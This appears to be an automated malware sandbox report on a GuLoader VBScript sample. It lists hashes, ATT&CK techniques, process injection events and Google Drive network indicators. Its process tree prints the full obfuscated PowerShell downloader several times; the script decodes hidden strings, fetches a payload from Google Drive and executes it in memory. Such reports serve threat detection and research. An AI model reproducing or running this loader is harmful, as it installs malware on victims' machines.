guloader | f104572d09f9f2cbec6f95cd5dbb676804216ce5ae3f35cff1582a35a4849238

General

Target

f104572d09f9f2cbec6f95cd5dbb676804216ce5ae3f35cff1582a35a4849238.vbe
Size

26KB
MD5

e11bbc8cee5056167a63bcef0fe84e4d
SHA1

3e918da8f1b5470bb595a6b0b547cbcd027f7092
SHA256

f104572d09f9f2cbec6f95cd5dbb676804216ce5ae3f35cff1582a35a4849238
SHA512

9c408ac208f0afcb9d9c2ed8a6f4087e7e72585757a2969905dd31c20481905d2cbfde067b43242100bc2b70c10e8d3fb1e400d0cf47281c9dd1eb1ce1f6d2fc
SSDEEP

384:3ydPCgpjudNX1kAfBmtAKNaZQZVNiBW3R:idPZp6dzkAf0t3ag/iBW3R

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1216	powershell.exe
7	1216	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1216	powershell.exe
2944	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1216	powershell.exe
2776	cmd.exe
2944	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1552	wabmig.exe
1552	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2944	powershell.exe
1552	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2944 set thread context of 1552	2944	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2944	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1216	powershell.exe
2944	powershell.exe
2944	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2944	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1552	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 1216	1744	WScript.exe	29
PID 1744 wrote to memory of 1216	1744	WScript.exe	29
PID 1744 wrote to memory of 1216	1744	WScript.exe	29
PID 1216 wrote to memory of 2892	1216	powershell.exe	31
PID 1216 wrote to memory of 2892	1216	powershell.exe	31
PID 1216 wrote to memory of 2892	1216	powershell.exe	31
PID 1216 wrote to memory of 2776	1216	powershell.exe	33
PID 1216 wrote to memory of 2776	1216	powershell.exe	33
PID 1216 wrote to memory of 2776	1216	powershell.exe	33
PID 2776 wrote to memory of 2944	2776	cmd.exe	34
PID 2776 wrote to memory of 2944	2776	cmd.exe	34
PID 2776 wrote to memory of 2944	2776	cmd.exe	34
PID 2776 wrote to memory of 2944	2776	cmd.exe	34
PID 2944 wrote to memory of 2636	2944	powershell.exe	35
PID 2944 wrote to memory of 2636	2944	powershell.exe	35
PID 2944 wrote to memory of 2636	2944	powershell.exe	35
PID 2944 wrote to memory of 2636	2944	powershell.exe	35
PID 2944 wrote to memory of 1552	2944	powershell.exe	36
PID 2944 wrote to memory of 1552	2944	powershell.exe	36
PID 2944 wrote to memory of 1552	2944	powershell.exe	36
PID 2944 wrote to memory of 1552	2944	powershell.exe	36
PID 2944 wrote to memory of 1552	2944	powershell.exe	36
PID 2944 wrote to memory of 1552	2944	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f104572d09f9f2cbec6f95cd5dbb676804216ce5ae3f35cff1582a35a4849238.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Apertured.Unu && echo t"
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= 